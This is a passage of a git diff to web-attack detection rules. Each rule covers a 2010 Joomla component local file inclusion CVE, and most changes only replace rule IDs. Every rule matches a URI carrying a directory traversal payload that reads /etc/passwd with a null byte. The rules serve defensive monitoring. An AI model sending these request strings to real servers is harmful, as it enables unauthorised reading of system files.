/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-1353:Joomla! Component LoginBox - Local File Inclusion +id: ad0a798b-87d2-4701-82d4-f7a253e44d69 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) + component for Joomla! allows remote attackers to read arbitrary files via a .. (dot + dot) in the view parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12068 +- https://www.cvedetails.com/cve/CVE-2010-1353 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1474.yaml b/rules/web/web_cve_CVE-2010-1474.yaml index f0c21085..a9d56934 100644 --- a/rules/web/web_cve_CVE-2010-1474.yaml +++ b/rules/web/web_cve_CVE-2010-1474.yaml @@ -1,26 +1,26 @@ -title: CVE-2010-1474:Joomla! Component Sweetykeeper 1.5 - Local File Inclusion -id: b2a1a114-6d92-4cce-8b53-b82518abf56c -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) - component 1.5.x for Joomla! allows remote attackers to read arbitrary files and - possibly have unspecified other impact via a .. (dot dot) in the controller parameter - to index.php. -references: -- https://www.exploit-db.com/exploits/12182 -- https://www.cvedetails.com/cve/CVE-2010-1474 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-1474:Joomla! Component Sweetykeeper 1.5 - Local File Inclusion +id: 1248cb2d-f96a-49a0-83b0-c1e2c74ae397 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) + component 1.5.x for Joomla! allows remote attackers to read arbitrary files and + possibly have unspecified other impact via a .. (dot dot) in the controller parameter + to index.php. +references: +- https://www.exploit-db.com/exploits/12182 +- https://www.cvedetails.com/cve/CVE-2010-1474 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1475.yaml b/rules/web/web_cve_CVE-2010-1475.yaml index b4e9e4f1..465857ed 100644 --- a/rules/web/web_cve_CVE-2010-1475.yaml +++ b/rules/web/web_cve_CVE-2010-1475.yaml @@ -1,25 +1,25 @@ -title: CVE-2010-1475:Joomla! Component Preventive And Reservation 1.0.5 - Local File - Inclusion -id: 6d1e0e6f-4e68-4f1c-8f60-467521d0c25b -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) - component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and - possibly have unspecified other impact via a .. (dot dot) in the controller parameter - to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-1475:Joomla! Component Preventive And Reservation 1.0.5 - Local File + Inclusion +id: 5cf9e456-3c79-4d1c-a926-a5a2d20b6f26 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) + component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and + possibly have unspecified other impact via a .. (dot dot) in the controller parameter + to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1495.yaml b/rules/web/web_cve_CVE-2010-1495.yaml index a3b4cdc1..db0c2483 100644 --- a/rules/web/web_cve_CVE-2010-1495.yaml +++ b/rules/web/web_cve_CVE-2010-1495.yaml @@ -1,25 +1,25 @@ -title: CVE-2010-1495:Joomla! Component Matamko 1.01 - Local File Inclusion -id: 6edfc22e-9b33-43c4-8872-eb41d6cfb5bd -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Matamko (com_matamko) component - 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) - in the controller parameter to index.php. -references: -- https://www.exploit-db.com/exploits/12286 -- https://www.cvedetails.com/cve/CVE-2010-1495 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-1495:Joomla! Component Matamko 1.01 - Local File Inclusion +id: 807aa121-81eb-418f-9bbb-a215d8c6f0e7 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Matamko (com_matamko) component + 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) + in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12286 +- https://www.cvedetails.com/cve/CVE-2010-1495 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1532.yaml b/rules/web/web_cve_CVE-2010-1532.yaml index b3df21b9..76359b0d 100644 --- a/rules/web/web_cve_CVE-2010-1532.yaml +++ b/rules/web/web_cve_CVE-2010-1532.yaml @@ -1,24 +1,24 @@ -title: CVE-2010-1532:Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion -id: d1890f8a-ef82-4d0c-a686-bace99bd54f2 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) - component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and - possibly have unspecified other impact via a .. (dot dot) in the controller parameter - to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-1532:Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion +id: 3f5ed59b-1944-4325-b675-5ea2441069f1 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) + component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and + possibly have unspecified other impact via a .. (dot dot) in the controller parameter + to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1533.yaml b/rules/web/web_cve_CVE-2010-1533.yaml index 53b10518..d0566b2f 100644 --- a/rules/web/web_cve_CVE-2010-1533.yaml +++ b/rules/web/web_cve_CVE-2010-1533.yaml @@ -1,23 +1,23 @@ -title: CVE-2010-1533:Joomla! Component TweetLA 1.0.1 - Local File Inclusion -id: 432ecccc-dfd6-4c0f-8173-0f57f8eafe46 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the TweetLA (com_tweetla) component - 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot - dot) in the controller parameter to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-1533:Joomla! Component TweetLA 1.0.1 - Local File Inclusion +id: fb9d6f93-d5ce-45e5-abf4-51b092d082a2 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the TweetLA (com_tweetla) component + 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot + dot) in the controller parameter to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1535.yaml b/rules/web/web_cve_CVE-2010-1535.yaml index f5d20bce..3f94a2df 100644 --- a/rules/web/web_cve_CVE-2010-1535.yaml +++ b/rules/web/web_cve_CVE-2010-1535.yaml @@ -1,24 +1,24 @@ -title: CVE-2010-1535:Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion -id: 36a64564-5ba1-40ff-a85f-6a0a11215c35 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the TRAVELbook (com_travelbook) - component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and - possibly have unspecified other impact via a .. (dot dot) in the controller parameter - to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-1535:Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion +id: 74d51ae3-410b-4654-bb2d-20cca140a39c +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the TRAVELbook (com_travelbook) + component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and + possibly have unspecified other impact via a .. (dot dot) in the controller parameter + to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1602.yaml b/rules/web/web_cve_CVE-2010-1602.yaml index e57fe8fe..6703b9a5 100644 --- a/rules/web/web_cve_CVE-2010-1602.yaml +++ b/rules/web/web_cve_CVE-2010-1602.yaml @@ -1,26 +1,26 @@ -title: CVE-2010-1602:Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion -id: e9519f69-b3b8-4695-88bb-5bf2d34e40aa -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) - component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and - possibly have unspecified other impact via a .. (dot dot) in the controller parameter - to index.php. -references: -- https://www.exploit-db.com/exploits/12283 -- https://www.cvedetails.com/cve/CVE-2010-1602 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-1602:Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion +id: 78b8be95-2dac-4660-867b-3096670f1801 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) + component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and + possibly have unspecified other impact via a .. (dot dot) in the controller parameter + to index.php. +references: +- https://www.exploit-db.com/exploits/12283 +- https://www.cvedetails.com/cve/CVE-2010-1602 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1657.yaml b/rules/web/web_cve_CVE-2010-1657.yaml index 614266e8..8cc04a14 100644 --- a/rules/web/web_cve_CVE-2010-1657.yaml +++ b/rules/web/web_cve_CVE-2010-1657.yaml @@ -1,25 +1,25 @@ -title: CVE-2010-1657:Joomla! Component SmartSite 1.0.0 - Local File Inclusion -id: b32928f2-521b-4e3b-b34c-cb49617727ca -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the SmartSite (com_smartsite) component - 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot - dot) in the controller parameter to index.php. -references: -- https://www.exploit-db.com/exploits/12428 -- https://www.cvedetails.com/cve/CVE-2010-1657 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-1657:Joomla! Component SmartSite 1.0.0 - Local File Inclusion +id: 1b858384-5226-47df-beb9-d9162c63b0da +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the SmartSite (com_smartsite) component + 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot + dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12428 +- https://www.cvedetails.com/cve/CVE-2010-1657 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1718.yaml b/rules/web/web_cve_CVE-2010-1718.yaml index ae4b53e3..22aa3401 100644 --- a/rules/web/web_cve_CVE-2010-1718.yaml +++ b/rules/web/web_cve_CVE-2010-1718.yaml @@ -1,24 +1,24 @@ -title: CVE-2010-1718:Joomla! Component Archery Scores 1.0.6 - Local File Inclusion -id: 60f6f1f4-0312-4416-bb31-fd376a59ce7b -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in archeryscores.php in the Archery - Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to - include and execute arbitrary local files via a .. (dot dot) in the controller parameter - to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-1718:Joomla! Component Archery Scores 1.0.6 - Local File Inclusion +id: 7f99cad1-85b6-4521-801e-aa27fa249207 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in archeryscores.php in the Archery + Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to + include and execute arbitrary local files via a .. (dot dot) in the controller parameter + to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1722.yaml b/rules/web/web_cve_CVE-2010-1722.yaml index f8de4108..0fc9c72a 100644 --- a/rules/web/web_cve_CVE-2010-1722.yaml +++ b/rules/web/web_cve_CVE-2010-1722.yaml @@ -1,25 +1,25 @@ -title: CVE-2010-1722:Joomla! Component Online Market 2.x - Local File Inclusion -id: e33e435a-51b1-416d-b0f3-0965a0b73af9 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Online Market (com_market) component - 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have - unspecified other impact via a .. (dot dot) in the controller parameter to index.php. -references: -- https://www.exploit-db.com/exploits/12177 -- https://www.cvedetails.com/cve/CVE-2010-1722 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-1722:Joomla! Component Online Market 2.x - Local File Inclusion +id: 2de26e96-5594-4743-a74b-d8687d807efa +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Online Market (com_market) component + 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have + unspecified other impact via a .. (dot dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12177 +- https://www.cvedetails.com/cve/CVE-2010-1722 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1875.yaml b/rules/web/web_cve_CVE-2010-1875.yaml index 48c7d585..d85a45fc 100644 --- a/rules/web/web_cve_CVE-2010-1875.yaml +++ b/rules/web/web_cve_CVE-2010-1875.yaml @@ -1,26 +1,26 @@ -title: CVE-2010-1875:Joomla! Component Property - Local File Inclusion -id: d989a93e-8f69-4419-876d-12bd5f9bfc19 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Real Estate Property (com_properties) - component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files - and possibly have unspecified other impact via a .. (dot dot) in the controller - parameter to index.php. -references: -- https://www.exploit-db.com/exploits/11851 -- https://www.cvedetails.com/cve/CVE-2010-1875 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-1875:Joomla! Component Property - Local File Inclusion +id: b2fa9b8b-da34-4598-b0dd-a77e409f786a +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Real Estate Property (com_properties) + component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files + and possibly have unspecified other impact via a .. (dot dot) in the controller + parameter to index.php. +references: +- https://www.exploit-db.com/exploits/11851 +- https://www.cvedetails.com/cve/CVE-2010-1875 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1953.yaml b/rules/web/web_cve_CVE-2010-1953.yaml index aed73819..7317ab8e 100644 --- a/rules/web/web_cve_CVE-2010-1953.yaml +++ b/rules/web/web_cve_CVE-2010-1953.yaml @@ -1,25 +1,25 @@ -title: CVE-2010-1953:Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion -id: 88a112bd-6581-4492-8d76-5c984d738c09 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) - component 1.0 for Joomla! allows remote attackers to read arbitrary files via a - .. (dot dot) in the controller parameter to index.php. -references: -- https://www.exploit-db.com/exploits/12288 -- https://www.cvedetails.com/cve/CVE-2010-1953 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-1953:Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion +id: 0dcfbc60-2e37-4b43-a916-19cb2b8566d1 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) + component 1.0 for Joomla! allows remote attackers to read arbitrary files via a + .. (dot dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12288 +- https://www.cvedetails.com/cve/CVE-2010-1953 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1954.yaml b/rules/web/web_cve_CVE-2010-1954.yaml new file mode 100644 index 00000000..4b769808 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1954.yaml @@ -0,0 +1,23 @@ +title: CVE-2010-1954:Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion +id: b669a952-66dd-4336-9372-1a91f0f7df69 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) + component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files + via a .. (dot dot) in the controller parameter to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1955.yaml b/rules/web/web_cve_CVE-2010-1955.yaml index c74eeaa7..cfbab60f 100644 --- a/rules/web/web_cve_CVE-2010-1955.yaml +++ b/rules/web/web_cve_CVE-2010-1955.yaml @@ -1,25 +1,25 @@ -title: CVE-2010-1955:Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion -id: 5eeaa5a1-e6d1-46f8-9bf3-ef141d6733f9 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) - component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via - a .. (dot dot) in the controller parameter to index.php. -references: -- https://www.exploit-db.com/exploits/12238 -- https://www.cvedetails.com/cve/CVE-2010-1955 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-1955:Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion +id: 25f05d16-2cb0-442b-9902-d3ad8cff11f7 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) + component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via + a .. (dot dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12238 +- https://www.cvedetails.com/cve/CVE-2010-1955 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1979.yaml b/rules/web/web_cve_CVE-2010-1979.yaml index ddd153dc..02ca8a2a 100644 --- a/rules/web/web_cve_CVE-2010-1979.yaml +++ b/rules/web/web_cve_CVE-2010-1979.yaml @@ -1,25 +1,25 @@ -title: CVE-2010-1979:Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion -id: 0221e773-afea-48bf-b3b2-dd60ed509720 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) - component build 880 for Joomla! allows remote attackers to read arbitrary files - via a .. (dot dot) in the controller parameter to index.php. -references: -- https://www.exploit-db.com/exploits/12088 -- https://www.cvedetails.com/cve/CVE-2010-1979 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-1979:Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion +id: 8d003d22-516d-445b-a8cf-809065ec3d2a +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) + component build 880 for Joomla! allows remote attackers to read arbitrary files + via a .. (dot dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12088 +- https://www.cvedetails.com/cve/CVE-2010-1979 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1983.yaml b/rules/web/web_cve_CVE-2010-1983.yaml index 2d8c8113..e3de690f 100644 --- a/rules/web/web_cve_CVE-2010-1983.yaml +++ b/rules/web/web_cve_CVE-2010-1983.yaml @@ -1,25 +1,25 @@ -title: CVE-2010-1983:Joomla! Component redTWITTER 1.0 - Local File Inclusion -id: b205e0d0-b61a-4a7a-a8db-45225cad643f -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) - component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary - files via a .. (dot dot) in the view parameter to index.php -references: -- https://www.exploit-db.com/exploits/12055 -- https://www.cvedetails.com/cve/CVE-2010-1983 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-1983:Joomla! Component redTWITTER 1.0 - Local File Inclusion +id: ef76c1fe-3653-4530-b55b-0676b399c927 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) + component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary + files via a .. (dot dot) in the view parameter to index.php +references: +- https://www.exploit-db.com/exploits/12055 +- https://www.cvedetails.com/cve/CVE-2010-1983 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-2033.yaml b/rules/web/web_cve_CVE-2010-2033.yaml index de4c9b39..12a5c02e 100644 --- a/rules/web/web_cve_CVE-2010-2033.yaml +++ b/rules/web/web_cve_CVE-2010-2033.yaml @@ -1,26 +1,26 @@ -title: CVE-2010-2033:Joomla Percha Categories Tree 0.6 - Local File Inclusion -id: d61b5ebd-9dc8-4dc5-b377-5e7cabfde00e -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) - component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly - have unspecified other impact via a .. (dot dot) in the controller parameter to - index.php. -references: -- 